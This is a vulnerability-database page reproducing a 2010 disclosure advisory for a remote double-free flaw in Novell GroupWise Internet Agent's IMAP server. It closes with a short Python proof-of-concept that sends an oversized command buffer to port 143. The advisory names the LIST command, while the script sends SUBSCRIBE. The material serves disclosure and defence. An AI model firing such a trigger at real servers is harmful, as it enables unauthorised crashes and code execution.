Lucene search
+L

Novell Groupwise Internet Agent - IMAP 'LIST' Remote Code Execution

🗓️ 09 Nov 2010 00:00:00Reported by Francis ProvencherType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 36 Views

Novell Groupwise Internet Agent IMAP remote code execution vulnerabilit

Related
Code
ReporterTitlePublishedViews
Family
circl
Circl
CVE-2010-4711
9 Nov 201000:00
circl
cve
CVE
CVE-2010-4711
31 Jan 201119:00
cve
cvelist
Cvelist
CVE-2010-4711
31 Jan 201119:00
cvelist
euvd
EUVD
EUVD-2010-4676
7 Oct 202500:30
euvd
nessus
Tenable Nessus
GroupWise Internet Agent < 8.0.2 HP1 Multiple Flaws
23 Nov 201000:00
nessus
nvd
NVD
CVE-2010-4711
31 Jan 201120:00
nvd
prion
Prion
Double free
31 Jan 201120:00
prion
redhatcve
RedhatCVE
CVE-2010-4711
22 May 202501:16
redhatcve
susecve
SUSE CVE
SUSE CVE-2010-4711
30 Apr 202602:44
susecve
#####################################################################################

Application:   {PRL} Novell Groupwise Internet Agent IMAP LIST Command Remote Code Execution Vulnerability
Platforms:   Linux

Exploitation:   Remote code execution

CVE Number: Pending

Novell TID:   7007151

ZeroDayInitiative: ZDI-10-242

Author:   Francis Provencher (Protek Research Lab's)

Blog:   http://www.protekresearchlab.com/

#####################################################################################

1) Introduction
2) Report Timeline
3) Technical details
4) The Code


#####################################################################################

===============
1) Introduction
===============

Novell, Inc. is a global software and services company based in Waltham, Massachusetts. The
company specializes in enterprise operating systems, such as SUSE Linux Enterprise and Novell
NetWare; identity, security, and systems management solutions; and collaboration solutions,
such as Novell Groupwise and Novell Pulse. Novell was instrumental in making the Utah Valley a
focus for technology and software development. Novell technology contributed to the emergence
of local area networks, which displaced the dominant mainframe computing model and changed
computing worldwide. Today, a primary focus of the company is on developing open source software
for enterprise clients.

(http://en.wikipedia.org/wiki/Novell)

#####################################################################################

============================
2) Report Timeline
============================

2010-07-20 Vendor Contact by Tippingpoint
2010-11-08 Vendor release advisory


#####################################################################################

============================
3) Technical details
============================

This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations
of Novell Groupwise Internet Agent. Authentication is not required to exploit this vulnerability.

The flaw exists within the IMAP server component which listens by default on TCP port 143. When
handling an IMAP LIST command with a large parameter the process attempts to free the same memory
twice. A remote attacker can exploit this vulnerability to execute arbitrary code under the
context of the IMAP server.

#####################################################################################

===========
4) The Code
===========


#!/usr/bin/python
#
# Francis Provencher
# Protek Research Lab.
#
#


import socket

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

buffer = '\x41' * 56000

s.connect(('192.168.100.177',143))
s.recv(1024)
s.send('A001 LOGIN test test \r\n')
s.recv(1024)
s.send('A001 SUBSCRIBE ' + buffer + '\r\n')
s.recv(1024)
s.close()


#####################################################################################
(PRL-2010-07)

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation